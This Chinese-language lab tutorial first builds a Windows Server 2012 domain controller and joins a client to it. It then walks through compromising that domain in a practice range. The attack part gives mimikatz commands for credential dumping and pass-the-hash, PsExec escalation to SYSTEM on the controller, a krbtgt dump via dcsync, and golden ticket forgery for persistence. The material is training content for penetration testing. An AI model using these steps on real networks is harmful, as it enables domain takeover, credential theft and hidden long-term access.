那么我们现在也来试着搭建一下域控
一、安装域(1.网络;防火墙。2.DNS、AD。3.)
安装域控制器之前需要几步简单的操作及注意事项
1:安装完后最好不要更改域控制器计算机名,可能会出现问题(基本出问题的几率90%以上)。
2:提前设置好本地administrator用户的密码并牢记(不然的话在先决条件基本通过不了)。
3:第一台域控制器也是DNS服务器(好像2012是这样的,其他版本不知道),所以IP和DNS设置必须是一样的,网关DNS也需要设置,(不设置的话客户机加域会出现问题)具体情况以网络构造而定。
可以参照下面这4篇文章
server 2008 详细搭建。
https://blog.csdn.net/qq_26741933/article/details/90376714
server 2008 详细搭建2
https://blog.csdn.net/qq_43170906/article/details/92832634?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.channel_param
域控机+客户机搭建
https://blog.csdn.net/jiaqu2177/article/details/81943615
域控机+客户机搭建2
https://jingyan.baidu.com/article/14bd256e469874bb6d2612a7.html
+++++++++++++++++++++++++++++++++++++++++++++++++
https://www.sohu.com/a/166462698_99973431(域用户登录客户机
)
首先先创建一台window的服务器(这里我用的是server 2012)
更改计算机名完成后重启
记得给配置固定IP地址,我这里是虚拟机,所以IP地址仅供参考。(DC)
域服务器的话,DNS可以设置多个的,首DNS IP必需是域控服务器的IP,其它次DNS的IP就是公网DNS IP。
(我这里的192.168.0.2是网关,通过网关转发出去)
dns服务器就是域控的ip地址
设置管理员账号密码之后域控登陆就是此密码,牢记
1、打开服务器控制面板
(1)打开服务器管理器,添加角色和功能。
(2)选择AD域服务,下一步 。
为了防止意外,我们让他自启动
二、配置域
(1)点击服务器管理器左侧“AD DS” 、点击黄色提示部分中的更多。
(2)点击“将此服务器升级为域控制器” 。
(3)进入AD域服务器配置向导,选择 “添加新林” ,输入域,点击下一步。
(4)设置域控还原密码,下一步 。
下图为解释,为什么要弄还原密码
这里我设置的还原密码为111111yY
(5)提示DNS无法创建,不用管,继续下一步 。
(6)安装路径,默认,下一步 。
(7)查看选项,默认,下一步 。
(8)点击安装 。此过程可能会报错,提示登陆用户没有设置密码,去设置给当前登陆用户(Administrator)设置一个密码,然后回来点击 “重新运行先决条件检查” 即可!
(9)安装完成,会提示注销重启 (此过程比较漫长,耐心等待)。
四、将客户机加入到域控服务器
这里的客户机我用的win7,只有域控服务器有点小要求,客户机只要是window都可以。
(1)打开转换服务器,修改转换服务器的NDS,指向域控服务器(刚才的服务器ip地址)。
这里是我虚拟机的ip,具体情况根据自己的环境来设置
(2)在计算机属性中,修改计算机名称(随意),并添加到域控服务器(域为“添加新林”时设置的域名),确定后提示注销重启服务器。
或者加一下后缀也可以
输入域控制器管理员用户及密码,单击确定。
就是域控制服务器的账户和解锁密码,不要想多了,不是啥值钱设置的还原密码,账户也不是什么奇奇怪怪的账号
(3)打开域控服务器,点击管理 > 添加服务器,输入转换服务器修改后的计算机名称,立即查找。将搜索到的服务器双击添加到右边,点击确定。
还有一定要记得把客户机的防火墙关了,不然后面一步访问不了
(4)在域控服务器中,所有服务器显示两台服务器,并都是联机状态则表示成功 。
至此,域控服务器安装完成。
由于法国神器只能抓取明文
那么如果我们不想让法国神器抓取到我们的明文密码的话,我么就要打KB2871997的补丁,再修改注册列表
。
KB2871997补丁链接
https://www.microsoft.com/zh-CN/download/confirmation.aspx?id=42745
在客户机上安装这个补丁。
然后修改一下注册列表
创建好后,值设为 0
可以通过其他在域中的客户机登录域控机
那么为什么任意客户机登录域控机账号,可以识别是域控账号呢?
这里就要牵扯到kerberos协议
之前域控机来登录过其他客户机,那么域控机会不会留下密码呢?
看到了Domain这一栏的yq233
,是域名,说明了之前域控机来登录过。
我们来看下他的域账户计算机名
是啥,但是报错了,这里可以明确的告诉你,是因为权限不够,administrator不是最高权限,system才是最高权限。
既然需要system权限才能执行一些命令,那么我们就提升到system权限。可以用一个工具PsEexec.exe
前提条件:
然后我们在普通cmd里执行这个提权工具,生成提权cmd,然后提权cmd可以看到是system权限
现在我们在提权工具生成的cmd来执行之前那个查询域账户计算机名
命令就可以正常执行了。
好了,我们现在知道了域控名字和密文密码
注:数据库不储存明文密码,一般都是储存密文密码
我们用法国神器抓取到密文后,通过哈希传递来登录域控机
抓取哈希密码
privilege::debug
sekurlsa::logonpasswords
红色部分是要替换的部分
哈希传递命令:
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:11186c1ce83e1fcfc9520d0252312118
这里要说下关于法国神器的几个坑
1、要复制里面的字符,必须先输入log命令,在法国神器同目录下生成一个mimikatz.log文件,然后我们这个在这个文件里复制法国神器里的字符。
2.粘贴的时候要点击窗口=》编辑=》粘贴
然后在法国神器里输入改好的哈希传递命令
输入哈希传递命令后,她会生成一个哈希cmd框,就可以连接上域控机。虽然这里的whami是a1(客户机),
但是他已经哈希传递了给域控机效验了
。
这里我们通过之前提权cmd知道的域名,现在来通过哈希cmd查看到的域控机的C盘里的相关信息。
而直接普通cmd是不能查看的。必须通过哈希传递的cmd,才能查看到域控机的信息。这里查看的是c盘的信息
我们通过上面的哈希传递知道了域控机的C盘信息,那我们要知道其他信息呢?
那么可以直接
PsExec.exe \\计算机名.域名 cmd
如下图第一句命令(我们在哈希cmd里用提权工具)
我们就成功得到域控机的cmd了
(这里我还是把图里的命令打出来:
PsExec.exe \\WIN-D6PMU0BIMC1.zkaq.cn cmd
这样我就可以为所欲为了,添加个账号也挺好的,不过不建议这么干,动静太大了。这里我们要知道域控可以登录一切域内机器,所以域控的账号密码会换来换去,我们可能下次就不能这样的登录了,那么为了维持长久的控制,我们要去制作伪造一个黄金票据。他域控密码改了我也能继续用。
我们通过哈希传递得到域控机cmd,然后创建一个账户并提权(这里不要慌,我们弄了黄金票据后就马上删掉这个账户),然后3389登录,并在域控机里用法国神器执行:
lsadump::dcsync /user:krbtgt
注意!这里是在连接了域控机的3389
然后在把SID和hash这2个的值给复制出来,我们就可以伪造黄金票据了。
制作黄金票据(是在客户机上制造黄金票据,域控机只是拿到SID和NTLM)
红色部分是要替换的部分(3处
kerberos::golden /admin:administrator /domain:zkaq.cn
/sid:S-1-5-21-1720693672-3610745784-2269473857
/krbtgt:1176ad25a126d316ed5ea4b60b3d71dd
/ticket:administrator.kiribi。
然后把这个黄金票据在自己的主机或者域控里的客户机上
的法国神器里执行,就会在与法国神器同目录下生成一个文件。这个文件就是生成的黄金票据。
然后加载黄金票据
kerberos::ptt administrator.kiribi
然后在本地或者域控的客户机上查看票据
有了黄金票据后,我们直接在本机上的普通cmd执行,就可以拿到权限和想要的信息了
开始靶场测试
我们来抓取一下哈希密码(Domain的值、NTLM的值)
sekurlsa::logonpasswords
sekurlsa::logonpasswords
输入哈希传递命令后,她会弹出一个新的cmd框,在这个弹出的cmd框就可以连接上域控机。
sekurlsa::pth /user:administrator /domain:"zkaq.cn" /ntlm:11186c1ce83e1fcfc9520d0252312118
接下来是查询信息,查询命令是dir C:/
但是我们这里是在域里面
所以命令应该是
dir 域名\C$
我们先查看域名,发现报错,报错的原因是因为administrator权限还是不够,要system权限才够。
那么我们在客户机上使用window官方提权软件,之后会弹出一个新的cmd框。
在这个弹出来的cmd框内,我们查看域名
。
然后我们再在哈希传递弹出的cmd框上查看域控机的C盘里信息
dir 域名\C$
然后我们再在哈希传递的的cmd框里用window自带的提权软件,再提权下cmd,就连接到域控机的cmd了
我们再在域控机里创建一个用户。
并把这个用户提权。
然后我们在用3389连接这个用户。
然后就拿到flag了
如果不想保留这个新创建的用户,搞这么大的动静,后面还可以做黄金票据后,再把这个新建用户删了。
最后还是来总结一下
在哈希传递的cmd里再用官方提权工具连接域控机的cmd
哈希传递和黄金票据制作都是在客户机上做
只有黄金票据所需要的值才是在域控机上做
———————————————————————————
1》抓取哈希密码
2》得到哈希传递cmd
3》在哈希传递cmd查看域控机信息之前,先要查看域名
4》然后在哈希传递cmd里使用官方提权工具新建管理员用户
5》远程连接域控机,就用这个新建管理用户去连接。
6》如果有需要,可以制作黄金票据